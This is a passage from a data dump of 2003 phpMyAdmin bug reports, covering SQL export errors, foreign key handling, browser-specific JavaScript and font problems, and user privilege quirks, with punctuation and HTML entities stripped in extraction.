Problem occured when I try to import the dumped SQL scheme; error occured and MySQL said amp;quot; 1005 Can t create table .\xxx\pages.frm errno 150) amp;quot;.
SQL scheme have been attached).
I ve analyzed the problem and find out that there s something wrong with algorithm which is used in dumping SQL scheme when there s a referential integrity rule.
It looks like PMA treats table with foreign key inside, the same with without one.
Foreign key is included in single statement of create table, without checking whether it s deserved or not.
I think, the algorithm should be used is as follows.
1\.
create all) table with index for each foreign key s fields parent and child table) without all) having foreign key statement included inside, 2\.
create referential intergrity rules with ALTER TABLE ...; , 3\.
and the last, insert data if it s possible, from the parent table first) Have I written a right report or something misses?
Please, let me know.
Thx for your attention.
Best regards, mahara NB I uses Windows XP Professional SP1 IE 6 SP1 Netscape 7.1 Apache 1.3.28 PHP 4.3.3 MySQL 4.0.14b phpMyAdmin 2.5.3 Original URL https sourceforge.net p phpmyadmin bugs 999 https sourceforge.net p phpmyadmin bugs 999 Original author anonymous Found in version 2.5.3","bug"
"24444","7370","Password not kept when modifying user.
I created a amp;quot;test amp;quot; user with only local access.
I wanted to change that.
When using the amp;quot;Change Login Information amp;quot; form modifying a MySQL user) I entered User name [Use text field ] test Host [Any Host] Password [Do not change the password] And I choose amp;quot;delete the old one from the user tables.
amp;quot; I think it s not really a bug, but it s a nice idea to select the encrypted password and re insert it into privilege tables when modifying a user.
Anyway, thanks for your work.
MagicalTux w ff.st Original URL https sourceforge.net p phpmyadmin bugs 1005 https sourceforge.net p phpmyadmin bugs 1005 Original author upsilon Found in version 2.5.3","bug"
"24444","7371","Use html entities for translated versions.
If the translated versions of the interface were to use HTML entities, I could switch my browser to say, UTF 8, to look at UTF 8 strings in my database without the umlauts in my german iso8859 1 translation of phpmyadmin breaking.
Original URL https sourceforge.net p phpmyadmin bugs 1000 https sourceforge.net p phpmyadmin bugs 1000 Original author neuhaus","bug"
"24444","7372","Left frame textsize too small in Safari.
I have just made some changes in my PMA config.
LeftFrameLight is now false, LeftFrameTableSeparator is now one underscore), and LeftFrameTableLevel is left at the default 1.
In Safari, the fontsize used to display the table names in the sublevels is too small.
It is not antialiased or, put another way, it is aliased) and it is almost illegible.
It is smaller than the fontsize used to display the table names in the amp;quot;main amp;quot; level.
If I set LeftFrameTableLevel to 2, then the 2nd level down is even smaller and even less readable.
In IE, all sublevels use the same text size as the amp;quot;main amp;quot; level, and remain readable.
I prefer IE s behavior in this regard.
Bug 752646 shows that changes were made in PMA 2.5.2 because according to user reports text was too large in Safari.
However further notes in the bug indicate that this was a beta version of Safari, and that the final 1.0 version has a better default text size.
Perhaps that amp;quot;fix amp;quot; is responsible for the problem I am reporting here.
The Safari betas should by now have all expired, so perhaps that amp;quot;fix amp;quot; should be reevaluated.
Original URL https sourceforge.net p phpmyadmin bugs 1001 https sourceforge.net p phpmyadmin bugs 1001 Original author ryandesign Found in version 2.5.3","bug"
"24444","7373","Undefined index sql.php with field name alias.
I executed this statement in my database SELECT product id, partnum AS part number, erp description, erp notes, cf description FROM `import` No problem.
Then I click the amp;quot;Export amp;quot; link at the bottom to generate SQL INSERT statements from the result set.
After specifying my export options, I get output starting like this phpMyAdmin SQL Dump version 2.5.3 http www.phpmyadmin.net Host monolith Generation Time Sep 23, 2003 at 05 14 PM Server version 4.0.14 PHP Version 4.3.3 Database `dev h` Dumping data for table `import` Notice Undefined index `part number` in Library WebServer phpMyAdmin 2.5.3 libraries export sql.php on line 424 INSERT INTO `import` `product id`, `part number`, `erp description`, `erp notes`, `cf description`) VALUES 280, XY123 , Multi Purpose Cable, 25\ , 6 pin connector both ends.
, Multi Purpose Cable, 25\ .
6 pin connector both ends.
); The part number field is filled in correctly in the dump, and all the rows appear to be there and correct.
Just, there s this amp;quot;undefined index amp;quot; error referencing the one alias I used in the SQL statement.
Original URL https sourceforge.net p phpmyadmin bugs 1002 https sourceforge.net p phpmyadmin bugs 1002 Original author ryandesign Found in version 2.5.3","bug"
"24444","7374","2.5.3) JS problems on export page with Opera 7.20.
The JS implementation of the new Opera 7.20 seems to be really messy.
The options box of the export page does not change anymore when the user chooses a different export format.
Because of this, the user can only see the options for the SQL export as long as he uses JS.
I believe that this has worked with previous Opera versions.
Original URL https sourceforge.net p phpmyadmin bugs 1008 https sourceforge.net p phpmyadmin bugs 1008 Original author rabus Found in version 2.5.3","bug"
"24444","7375","inserting rows with values and null checked.
I think it should be much better if, when inserting a row, the NULL checkbox would be automatically disabled when the user is inserting data as value of a field.
When I first tried to insert some row, I always got NULL values; it took me some time to understand why ) .
So, I think it s better to remove the NULL check when the user does really insert something in the value field.
Original URL https sourceforge.net p phpmyadmin bugs 1004 https sourceforge.net p phpmyadmin bugs 1004 Original author maxtruth","bug"
"24444","7376","Excel v.X does not import CSV for Excel exports.
Data exported from phpMyAdmin in amp;quot;CSV for Excel amp;quot; format does not open properly in Microsoft Excel v.X for Mac OS X.
Regardless of the number of fields that should have been in each line of the CSV file, each row in the Excel window only has one cell, with approximately the contents of the CSV line in that cell.
That is, the first line of my CSV file is this amp;quot;part number amp;quot;, amp;quot;description 1 amp;quot;, amp;quot;notes amp;quot;, amp;quot;description 2 amp;quot;, amp;quot;specs amp;quot;, amp;quot;flag amp;quot;, amp;quot;price amp;quot; And the first row of my Excel sheet has this in the first cell part number, amp;quot;description 1 amp;quot;, amp;quot;notes amp;quot;, amp;quot;description 2 amp;quot;, amp;quot;specs amp;quot;, amp;quot;flag amp;quot;, amp;quot;price amp;quot; Operating System Apple Mac OS X 10.2.8 build 6R65 Browser Apple Safari 1.0 build 85.5 Excel Microsoft Excel v.X 10.1.0 build 2015 Original URL https sourceforge.net p phpmyadmin bugs 1006 https sourceforge.net p phpmyadmin bugs 1006 Original author ryandesign Found in version 2.5.3","bug"
"24444","7377","invalid protected group in Left Frame.
From the german forum If you have set cfg[ LeftFrameTableSeperator ] set to or FALSE, a group protected will contain your tables.
This is only valid if you also have LeftFrameLight = FALSE.
While trying to fix this I have discovered that there are some missing amp;lt; div amp;gt;s around the table navigation.
I ll try to work on this.
Should be taken into account for 2.5.4 rc1!
Even though this does not seem to affect many installations, it s nasty. )
Original URL https sourceforge.net p phpmyadmin bugs 1007 https sourceforge.net p phpmyadmin bugs 1007 Original author garvinhicking","bug"
"24444","7378","Left Frame Highlighting incorrect.
When having a group of nested tables inside a parent Database, hovering above the parent database will first highlight all of the child tables inside the group.
When hovering above a child item, it gets highlighted still) and by leaving the item, it get s de colorized.
So you are basically erasing all highlights when hovering with the mouse above all sub items.
If you hover your mouse then above the parent item, no child items will be highlighted.
Or, if you have previously not hovered above all child items, only those you have not yet hovered will be highlighted.
If using a border around the child items to mark them instead of a background color), it works as expected.
This may be a bug in DOM or Mozilla IE Rendering, but in any case, it s ugly.
Original URL https sourceforge.net p phpmyadmin bugs 1009 https sourceforge.net p phpmyadmin bugs 1009 Original author garvinhicking","bug"
"24444","7379","undefined offset index when exporting.
I installed phpMyAdmin 2.5.4 rc1, and tried to export a database as SQL.
When exporting structure only, there is no error and it looks correct, but if I dump data or structure data, I get PHP errors.
INSERT statements are broken, that is no attribute names.
Original URL https sourceforge.net p phpmyadmin bugs 1010 https sourceforge.net p phpmyadmin bugs 1010 Original author ci dev Found in version Latest Git","bug"
"24444","7380","amp;quot;With selected Delete amp;quot; button always shown.
When you browse a table, you get back the results in a table, where you can mark rows to be deleted and delete them using the amp;quot;With selected Delete amp;quot; button.
However, this button is always shown, even when you cannot select rows, like amp;quot;SHOW TABLES amp;quot; or using the check optimize etc.
table from dropdown.
Maybe it s a bug, maybe it s a feature, I am not sure.
Original URL https sourceforge.net p phpmyadmin bugs 1011 https sourceforge.net p phpmyadmin bugs 1011 Original author ci dev Found in version Latest Git","bug"
"24444","7381","order clause is ambiguous.
Using the query amp;quot;SELECT `1`.`master field`, `2`.`master field` FROM `PMA relation` AS `1`, `PMA relation` AS `2` amp;quot; in the default amp;quot;PMA relation amp;quot; table of PMA database with at least one record in it) leads to an error 1052 Column master field in order clause is ambiguous) if you try to change sort order by clicking on the column headers.
The problem of not yet understood) aliases was already mentioned in 682386, but that error report had another topic focus bug...
Original URL https sourceforge.net p phpmyadmin bugs 1012 https sourceforge.net p phpmyadmin bugs 1012 Original author ci dev Found in version Latest Git","bug"
"24444","7382","Error when attempting to Browse Tables.
When trying to browse a table any) in version 2.53 I get the folowing error 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near LIMIT 0, 30 at line 1 Now thats a version MySQL version 4 error.
I recieved the same error with MySQL version 3, but it was less wordy.
Original URL https sourceforge.net p phpmyadmin bugs 1015 https sourceforge.net p phpmyadmin bugs 1015 Original author anonymous Found in version 2.5.3","bug"
"24444","7383","ANSI mode not supported.
The error below is received when I am in ANSI mode.
If I turn ANSI mode off I do NOT receive the error.
It appears as though the queries in server privileges.php do not take into account the fact that you are using MySQL in ANSI mode.
Warning Your privilege table structure seem to be older than this MySQL version!
Please run the script mysql fix privilege tables that should be included in your MySQL server distribution to solve this problem!
Notice Undefined index Password in C \phpMyAdmin 2.5.3\server privileges.php on line 997 Notice Undefined index Password in C \phpMyAdmin 2.5.3\server privileges.php on line 997 Notice Undefined index Password in C \phpMyAdmin 2.5.3\server privileges.php on line 997 Notice Undefined index Password in C \phpMyAdmin 2.5.3\server privileges.php on line 997 Original URL https sourceforge.net p phpmyadmin bugs 1013 https sourceforge.net p phpmyadmin bugs 1013 Original author kirbinator Found in version Latest Git","bug"
"24444","7384","Call to undefined function pma sethistory ).
for 2 5 4RC1 Its my first time using phpMyAdmin so this might be bogus.
I have found and recreated the minor bug the following way I created a simple users table with simple personal info.
Then i entered a query, and in the display window i clicked the Edit button to edit the SQL query.
In the pop ip window i first tried amp;quot;select from users limit 0,1 amp;quot; which works fine, but then i entered amp;quot;select from users limit 0,0 amp;quot; which sent the result window back to the initial amp;quot;query amp;quot; tab option.
The query field is there but underneath it exists an error message if parent.frames.queryframe amp;amp; amp;amp; parent.frames.queryframe.document amp;amp; amp;amp; parent.frames.queryframe.document.queryframeform) \{ parent.frames.queryframe.document.queryframeform.db.value = amp;quot;testDB amp;quot;; parent.frames.queryframe.document.queryframeform.table.value = amp;quot; amp;quot;; \} function reload querywindow ) \{ if parent.frames.queryframe amp;amp; amp;amp; parent.frames.queryframe.querywindow amp;amp; amp;amp; !parent.frames.queryframe.querywindow.closed amp;amp; amp;amp; parent.frames.queryframe.querywindow.location) \{ Fatal error Call to undefined function pma sethistory ) in usr local apache2 htdocs phpMyAdmin footer.inc.php on line 46 my email is nonickch at netscape dot net Original URL https sourceforge.net p phpmyadmin bugs 1017 https sourceforge.net p phpmyadmin bugs 1017 Original author anonymous","bug"
"24444","7385","Relational Scheme is overlapping.
if i create a pdf, the last site amp;quot;Relational Schema amp;quot; shows me overlapping table information.
the last table is shown but all other tables are behind them.
i can see behind the top table a little bit from another table.
could anyonen help me to fix this?
daniel Original URL https sourceforge.net p phpmyadmin bugs 1014 https sourceforge.net p phpmyadmin bugs 1014 Original author dsepeur","bug"
"24444","7386","no password after copying user.
I use amp;quot;Privileges amp;quot; and amp;quot;Edit amp;quot; and existing user.
In the amp;quot;Change Login Information Copy User amp;quot; section, I just change the hostname from any host [ ] to an IP based host).
amp;quot;Do not change the password amp;quot; is selected in the drop down box, so I expect it to use the password of the amp;quot;source amp;quot; use for the amp;quot;taget amp;quot; use the one to be created) as well.
I select amp;quot;keep the old one amp;quot; and press ok. All user permissions seem to be copied, and the user data as well, BUT the password value for the newly created user is empty.
I use a phpMyAdmin control user, set up after installation instructions, so it has NO access to mysql.user.Password attribute.
Either this feature is not working, or maybe more likely?)
the drop down box is just labeled misleadingly.
Original URL https sourceforge.net p phpmyadmin bugs 1016 https sourceforge.net p phpmyadmin bugs 1016 Original author ci dev","bug"
"24444","7388","Change tree view disabling.
Right now the JS for the left tree view sniffs for Opera and disables the dynamic collapse expand.
The collapse expand works properly in at least Opera 7.11 on, probably 7.0 .
I tested this by setting capable in the sniffing section to 1 for Opera.
I m not sure of the best way to detect Opera 7.0 .
Maybe check if style.display is modifiable?
This would be a more generic solution than sniffing a version.
As always, thanks for a great package.
Michael Original URL https sourceforge.net p phpmyadmin bugs 1019 https sourceforge.net p phpmyadmin bugs 1019 Original author redbeardc Found in version 2.5.3","bug"
"24444","7389","Warnings in PMA getTableContentOld.
In function PMA getTableContentOld In file libraries export sql.php left on top of function this global add query; becose... if I try export data it write me amp;lt;br amp;gt; amp;lt;b amp;gt;Warning amp;lt; b amp;gt; Undefined variable add query in amp;lt;b amp;gt; public www local html phpMyAdmin 2.5.4 rc2 libraries export sql.php amp;lt; b amp;gt; on line amp;lt;b amp;gt;560 amp;lt; b amp;gt; amp;lt;br amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 1020 https sourceforge.net p phpmyadmin bugs 1020 Original author anonymous Found in version 2.5.4 rc2","bug"
"24444","7390","Safari HUGE font.
Right now the font in Safari is absolutely huge!
So I took the liberty of adding this || PMA USR BROWSER AGENT == SAFARI to line number 593 in libraries common.lib.php file Might want to add that in the next release.
Original URL https sourceforge.net p phpmyadmin bugs 1024 https sourceforge.net p phpmyadmin bugs 1024 Original author murlyn","bug"
"24444","7391","Non selectable records large text fields.
When you try to view a record PhpMyAdmin uses the data in all fields to create a shortcut.
If a text field contains a huge amount of data the shortcut becomes to big for IE to handle.
Original URL https sourceforge.net p phpmyadmin bugs 1026 https sourceforge.net p phpmyadmin bugs 1026 Original author compupaul","bug"
"24444","7392","Options in listbox foreign key) appears twice.
options in listbox foreign key) appears twice when using the insert with help of relations stored in PMA relation table The following fix in module realtion.lib.php is adequate.
I do not foresee the complete scope of this module so I someone should make the real modification This routine at the bottom starting at line 630) of library module relation.lib.php causes the error function PMA foreignDropdown disp, foreign field, foreign display, data, max = 100) \{ global cfg; ret = amp;lt;option value= amp;quot; amp;quot; amp;gt; amp;lt; option amp;gt; .
amp;quot;\n amp;quot;; reloptions = array content id = amp;gt; array ), id content = amp;gt; array )); while relrow = PMA mysql fetch array disp)) \{ key = relrow[ foreign field]; if strlen relrow[ foreign display]) amp;lt;= cfg [ LimitChars ]) \{ value = foreign display != FALSE) ?
htmlspecialchars relrow[ foreign display]) ); vtitle = ; \} else \{ vtitle = htmlspecialchars relrow [ foreign display]); value = foreign display != FALSE) ?
htmlspecialchars substr vtitle, 0, cfg [ LimitChars ]) .
... ) ); \} reloption = amp;lt;option value= amp;quot; .
htmlspecialchars key) .
amp;quot; ; if vtitle != ) \{ reloption .= title= amp;quot; .
vtitle .
amp;quot; ; \} if key == data) \{ reloption .= selected= amp;quot;selected amp;quot; ; \} end if reloptions[ id content ][] = reloption .
amp;gt; .
value .
amp;amp;nbsp; amp;amp;nbsp; .
htmlspecialchars key) .
amp;lt; option amp;gt; .
amp;quot;\n amp;quot;; reloptions[ content id ][] = reloption .
amp;gt; .
htmlspecialchars key) .
amp;amp;nbsp; amp;amp;nbsp; .
value .
amp;lt; option amp;gt; .
amp;quot;\n amp;quot;; \} end while if max == 1 || count reloptions[ content id ]) amp;lt; max) \{ This line replace by next line to get rid of the first empty option.
In fact this should be optional based on the restriction rules for the foriegn key ret .= implode , reloptions[ content id ]); ret = implode , reloptions[ content id ]); AdB removed these lines because 2 more option does not make sense.
if count reloptions[ content id ]) amp;gt; 0) \{ ret .= amp;lt;option value= amp;quot; amp;quot; amp;gt; amp;lt; option amp;gt; .
amp;quot;\n amp;quot;; ret .= amp;lt;option value= amp;quot; amp;quot; amp;gt; amp;lt; option amp;gt; .
amp;quot;\n amp;quot;; \} \} AdB Removed this line because list appeared twice ret .= implode , reloptions[ id content ]); return ret; \} end of PMA foreignDropdown ) function \} PMA RELATION LIB ?
amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 1021 https sourceforge.net p phpmyadmin bugs 1021 Original author adbrinkkemper Found in version 2.5.4 rc2","bug"
"24444","7393","record in db details structure.php false.
When i refresh this page ; the number of records displaying is compltely false.
When i do several refresh to see the evolution of the data in all my tables ; sometimes records grew up sometimes decresed... but in fact NO INSERT DELETE SQL STATMENT occurs in the logs and no programs ran of this database !
from a shell when i do mysql my databae and do select count ) from my table ; the number of records dont move.
whats happened then ?
Original URL https sourceforge.net p phpmyadmin bugs 1022 https sourceforge.net p phpmyadmin bugs 1022 Original author anonymous","bug"
"24444","7394","Select escape single quotes.
imo the query constructor should escape at least single quotes in user input in amp;quot;Select amp;quot; form if theyxc2xb4re not escaped yet).
If you donxc2xb4t consider this a bug, please put it on the wishlist.
Original URL https sourceforge.net p phpmyadmin bugs 1023 https sourceforge.net p phpmyadmin bugs 1023 Original author phpsourcerer Found in version 2.5.3","bug"
"24444","7395","edit delete links sometimes show as buttons.
edit and delete links sometimes show as buttons in IE 6.0.
Original URL https sourceforge.net p phpmyadmin bugs 1025 https sourceforge.net p phpmyadmin bugs 1025 Original author placain Found in version 2.5.4 rc2","bug"
"24444","7396","wrong charset for russian windows 1251. phpMyAdmin has a mistake with languages!
This mistake there is in language pack windows 1251!
Charset koi 8, but must be charset win 1251 Original URL https sourceforge.net p phpmyadmin bugs 1027 https sourceforge.net p phpmyadmin bugs 1027 Original author anonymous Found in version 2.5.4 rc2","bug"
"24444","7397","Permissions must equal what is on screen.
I know I brought this up a long time ago.
A year or two ago, at least.
If a user does not have permissions to drop a table, s he should not see amp;quot;Drop amp;quot; in the GUI.
In short, what you see does not match what the user has the amp;quot;rights amp;quot; to do.
Is a fix for this still in the planning?
Original URL https sourceforge.net p phpmyadmin bugs 1028 https sourceforge.net p phpmyadmin bugs 1028 Original author jtjohnston","bug"
"24444","7398","PMA dl GD2 detection fails on PHP3.
GD2 detection fails on PHP3, because ob start is not supported.
See .
libraries defines php.lib.php3.
Original URL https sourceforge.net p phpmyadmin bugs 1029 https sourceforge.net p phpmyadmin bugs 1029 Original author nijel Found in version Latest Git","bug"
"24444","7399","Bookmarks should be disabled if not configured.
With empty pmadb and or bookmarktable I get on each page query SELECT query FROM .
WHERE .... the dot comes from empty db and table name.
Original URL https sourceforge.net p phpmyadmin bugs 1030 https sourceforge.net p phpmyadmin bugs 1030 Original author nijel Found in version Latest Git","bug"
"24444","7400","js errors in SQL History.
For example, SELECT from persons where person name= Marc gives a js error.
Original URL https sourceforge.net p phpmyadmin bugs 1033 https sourceforge.net p phpmyadmin bugs 1033 Original author lem9 Found in version Latest Git","bug"
"24444","7401","InnoDB foreign key problems.
I have a table that links to two others via foreign keys.
Until now I had simply set these up with the internal relations, but now that PMA has support for it, I ve switched to proper foreign keys to get deletion control.
In this particular table, I can t get one of the foreign key assignments to stick one works, but the other doesn t. the fields are identical in every way all are unsigned INTs with regular single indexes.
What is more, repeated submission of the relation form results in the table name display showing repeated foreign key info, like this id1) REFER db table id) ON DELETE CASCADE; id1) REFER db table id) ON DELETE CASCADE; id1) REFER db table id) ON DELETE CASCADE Also the group tag for bug reports doesn t yet include 2.5.4, so I ve had to label this as rc2, though this is actually the release version.
Original URL https sourceforge.net p phpmyadmin bugs 1034 https sourceforge.net p phpmyadmin bugs 1034 Original author coolbru Found in version 2.5.4","bug"
"24444","7402","Javascript error in amp;quot;Browse Foreign Values amp;quot;.
The amp;quot;Browse Foreign Values amp;quot; feature available when PMS relation is used) generates wrong Javascript code when French is selected as current language.
This may apply to other languages too.
More details browse foreigners.php formupdate 52 generates Javascript code using alert amp;lt;?php echo strWindowNotFound; ?
amp;gt; ); However, if the string strWindowNotFound contains single quotes this will be the case if you select, e.g., french iso 8859 1 as your language see french iso 8859 1.inc.php 701) the result will be wrong non escaped single quotes inside a single quoted constant string) alert La fenxc4x99tre principale n a pu xc4x99tre mise xc5x95 jour.
Il est possible que vous l ayiez fermxc3xa9e, ou encore que votre navigateur bloque les mises xc5x95 jour inter fenxc4x99tres pour des raisons de sxc3xa9curitxc3xa9.
); which triggers a Javascript syntax error.
A obvious workaround is to double quote the constant string alert amp;quot; amp;lt;?php echo strWindowNotFound; ?
amp;gt; amp;quot;); Cheers, Christophe bisiere univ tlse1.fr Original URL https sourceforge.net p phpmyadmin bugs 1031 https sourceforge.net p phpmyadmin bugs 1031 Original author anonymous Found in version 2.5.4 rc2","bug"
"24444","7403","Toggle Scratchboard and some page sizes.
This applies specifically to users using paper size letter or legal.
There is a case sensitivity issue in the switch statement of pdfPaperSize.
The JavaScript function pdfPaperSize checks for LETTER or LEGAL, however the function gets based letter or legal I was able to fix this by adding two extra cases case LETTER if axis == x ) return 612.00; else return 792.00; break; case letter if axis == x ) return 612.00; else return 792.00; break; case LEGAL if axis == x ) return 612.00; else return 1008.00; break; case legal if axis == x ) return 612.00; else return 1008.00; break; Original URL https sourceforge.net p phpmyadmin bugs 1032 https sourceforge.net p phpmyadmin bugs 1032 Original author chriswalshaz Found in version 2.5.3","bug"
"24444","7404","Select Binary.
Maybe I found a bug in Phpmyadin v 2.5.2 rc1.
SELECT id FROM table WHERE binary Loginname = amp;quot;name amp;quot; phpmyadmin returns Unknown column binaryLoginname in where clause I have tested this sql stagement in an other programm and these returns are correct.
Bob Original URL https sourceforge.net p phpmyadmin bugs 1035 https sourceforge.net p phpmyadmin bugs 1035 Original author anonymous Found in version 2.5.2 rc1","bug"
"24444","7405","Notice undefined variable url query.
Try SELECT count ) Notice Undefined variable url query in \phpMyAdmin 2.5.4\libraries\display tbl.lib.php on line 1477 Original URL https sourceforge.net p phpmyadmin bugs 1036 https sourceforge.net p phpmyadmin bugs 1036 Original author anonymous Found in version 2.5.4","bug"
"24444","7406","PMA purgeHistory generates MySQL parse error.
When I logged in to phpMyAdmin this morning I immediately got a MySQL parse error on the following query DELETE FROM `PMA history` WHERE timevalue amp;lt;= oddly formatted time I can t supply the exact error and message because I fixed it and when I restore the source to where it was it doesn t duplicate the error.
I traced it to the function PMA purgeHistory in relation.
lib.php.
I put the timevalue comparison in quotes and now it works.
A unified diff is attached.
Michael Original URL https sourceforge.net p phpmyadmin bugs 1037 https sourceforge.net p phpmyadmin bugs 1037 Original author redbeardc Found in version 2.5.4","bug"
"24444","7407","Fatal error Cannot redeclare.
Fatal error Cannot redeclare ) in home ton admin.ton.cx phpMyAdmin 2.5.4 libraries relation.lib.php on line 30 Original URL https sourceforge.net p phpmyadmin bugs 1038 https sourceforge.net p phpmyadmin bugs 1038 Original author anonymous Found in version 2.5.4","bug"
"24444","7408","Relations with InnoDB.
In amp;quot;Relation view amp;quot; are only Columns which are amp;quot;Primary Key amp;quot; in the amp;quot;Column Select List amp;quot;.
That is to restrictive.
Man Page amp;quot;Both tables have to be InnoDB type and there must be an index where the foreign key and the referenced key are listed as the first columns amp;quot; So a normal key is enough to create a reference.
Original URL https sourceforge.net p phpmyadmin bugs 1039 https sourceforge.net p phpmyadmin bugs 1039 Original author astir Found in version 2.5.4","bug"
"24444","7409","parser error grave accent.
Error There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT RVJST1I6IEMxIEMyIExFTjogNDYgNDcgMzMyClNUUjogkQoK Q1ZTOiAkSWQ6IHNxbHBhcnNlci5s aWIucGhwMyx2IDEuOTIgMjAwMy8wOS8xMCAxNzoxMzoy OSBsZW05IEV4cCAkCk15U1FMOiBQTUFf TVlTUUxfU1RSX1ZFUlNJT04KVVNSIE9TLCBBR0VOVCwgVkV SOiBXaW4gSUUgNi4wClBNQTogMi41 LjQKUEhQIFZFUixPUzogMy4wLjE4IExpbnV4CkxBTkc6IGVuL Wlzby04ODU5LTEKU1FMOiBBTFRF UiBUQUJMRSBgdF9ncm91cHNgIENIQU5HRSBgY2F0YCBgY2 F0YCBTRVQokUFnZSBNYXR0ZXJzkiyS QWxjb2hvbCAmYW1wOyBEcnVnc5IskkNoaWxkcmVukiySQ 29tbXVuaXR5kiySQ291bnNlbGxpbmeS LJJEaXNhYmlsaXR5IJYgR2VuZXJhbJIskkRpc2FiaWxpdHkgliB MZWFybmluZ5IskkRpc2FiaWxp dHkgliBQaHlzaWNhbJIskkRvbWVzdGljIFZpb2xlbmNlkiySRm9 yIE1lbpIskkZvciBMYWRpZXOS LJJHZW5lcmFsIEhlYWx0aJIskkhlYXJpbmeSLJJNZW50YWwg SGVhbHRokiySUmFwZZIsklZpY3Rp bSBTdXBwb3J0kiySVmlzaW9ukiySV2l0bmVzcyBTdXBwb3J0 kikgTk9UIE5VTEw= END CUT BEGIN RAW ERROR C1 C2 LEN 46 47 332 STR xc2x91 CVS Id sqlparser.lib.php3,v 1.92 2003 09 10 17 13 29 lem9 Exp MySQL PMA MYSQL STR VERSION USR OS, AGENT, VER Win IE 6.0 PMA 2.5.4 PHP VER,OS 3.0.18 Linux LANG en iso 8859 1 SQL ALTER TABLE `t groups` CHANGE `cat` `cat` SET xc2x91Age Mattersxc2x92,xc2x92Alcohol amp;amp; Drugsxc2x92,xc2x92Childrenxc2x92,xc2x92Communityxc2x92,xc2x92Counsellingxc2x92,xc2x92Disability xc2x96 Generalxc2x92,xc2x92Disability xc2x96 Learningxc2x92,xc2x92Disability xc2x96 Physicalxc2x92,xc2x92Domestic Violencexc2x92,xc2x92For Menxc2x92,xc2x92For Ladiesxc2x92,xc2x92General Healthxc2x92,xc2x92Hearingxc2x92,xc2x92Mental Healthxc2x92,xc2x92Rapexc2x92,xc2x92Victim Supportxc2x92,xc2x92Visionxc2x92,xc2x92Witness Supportxc2x92) NOT NULL END RAW SQL query ALTER TABLE `t groups` CHANGE `cat` `cat` SET xc2x91Age Mattersxc2x92,xc2x92Alcohol amp;amp; Drugsxc2x92,xc2x92Childrenxc2x92,xc2x92Communityxc2x92,xc2x92Counsellingxc2x92,xc2x92Disability xc2x96 Generalxc2x92,xc2x92Disability xc2x96 Learningxc2x92,xc2x92Disability xc2x96 Physicalxc2x92,xc2x92Domestic Violencexc2x92,xc2x92For Menxc2x92,xc2x92For Ladiesxc2x92,xc2x92General Healthxc2x92,xc2x92Hearingxc2x92,xc2x92Mental Healthxc2x92,xc2x92Rapexc2x92,xc2x92Victim Supportxc2x92,xc2x92Visionxc2x92,xc2x92Witness Supportxc2x92) NOT NULL MySQL said 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near Age Mattersxc2x92,xc2x92Alcohol amp;amp; Drugsxc2x92,xc2x92Childrenxc2x92,xc2x92Communityxc2x92,xc2x92Counsell [Documentation] Original URL https sourceforge.net p phpmyadmin bugs 1040 https sourceforge.net p phpmyadmin bugs 1040 Original author anonymous","bug"
"24444","7410","Multi row delete breaks form nesting.
When browsing the PMA Bookmarks table the button amp;quot;Execute Bookmark amp;quot; is no longer working since the introduction of multi row delete.
The following error message occurs when you click on the mentioned button Notice Undefined variable original sql query in \tbl row delete.php on line 49 Notice Undefined variable original url query in \tbl row delete.php on line 50 Notice Undefined variable original pos in \tbl row delete.php on line 51 tbl row delete.php Missing sql query It also breaks form based MIME transformations, because the values of a form are not directed to the originating page.
The basic problem, seems to me, is that a new form having tbl row delete.php as is target thereby overriding the original form tagged i.e.
tbl properties structure.php).
A possible fix could be to remove the new form and redirect to the tbl row delete.php if you clicked on the submit button for multi row delete.
With current behavior you could expect data loss if you select a row and then click on execute bookmark.
Regards, Jose Original URL https sourceforge.net p phpmyadmin bugs 1041 https sourceforge.net p phpmyadmin bugs 1041 Original author joe222 Found in version Latest Git","bug"
"24444","7411","JS error after editing SQL in query window.
Software versions phpMyAdmin 2.5.5 dev PHP 4.3.2, Apache 2, Windows XP, MySQL 4.0.13 Firebird 0.7, Mozilla 1.5, Internet Explorer 6.
I am not sure whether this is the proper place to list the issues I m having, but since the behavior seems to be different based on various browsers... Mozilla family I Browse a table and click the [Edit] link right to the SQL query top small div that displays the current query).
A new window opens displaying the query.
If I modify the query in the popup window and click Go instead of having the opener reloaded, the new results show in the current popup) window.
Clicking on the [Edit] link in the popup window now it looks exactly like the parent Browse window with the tabs and all).
Internet Explorer If you don t have the Disable script debugging option checked, then upon loading the page on IE the results load correctly in the opener), it displays an message about a syntax error on line 1044.
Going back to Moz, I notice that the JavaScript Console displays the same error Error syntax error Source File http localhost phpapps phpMyAdmin read dump.php3 Line 1044, Column 12 Source Code amp;lt;p amp;gt; amp;lt;b amp;gt;Error amp;lt; b amp;gt; amp;lt; p amp;gt; Looking into the source code this is what it generates code around the 1044 line) ... function reload querywindow ) \{ if parent.frames.queryframe amp;amp; amp;amp; parent.frames.queryframe.querywindow amp;amp; amp;amp; !parent.frames.queryframe.querywindow.closed amp;amp; amp;amp; parent.frames.queryframe.querywindow.location) \{ amp;lt;p amp;gt; amp;lt;b amp;gt;Error amp;lt; b amp;gt; amp;lt; p amp;gt; amp;lt;p amp;gt; SQL query amp;amp;nbsp; amp;amp;nbsp; amp;lt; p amp;gt; amp;lt;p amp;gt; ...
I ve attached the result file from the popup window in Moz).
Original URL https sourceforge.net p phpmyadmin bugs 1042 https sourceforge.net p phpmyadmin bugs 1042 Original author philipx","bug"
"24444","7412","Undefined variable comments in SQL export.
By Export from DB oder Tables on a mySQL Version 3.22.32 I get this error Warning Undefined variable comments in [....] dbadmin libraries export sql.php on line 311 If I switch to the other DB using mySQL 4.xx the error dosn t happens.
Alex Original URL https sourceforge.net p phpmyadmin bugs 1043 https sourceforge.net p phpmyadmin bugs 1043 Original author anonymous Found in version 2.5.4","bug"
"24444","7413","Export options not accessible in Opera.
When exporting database, table or query you can choose between the different export types.
Choosing an export type by clicking on the label it doesn t change the export options.
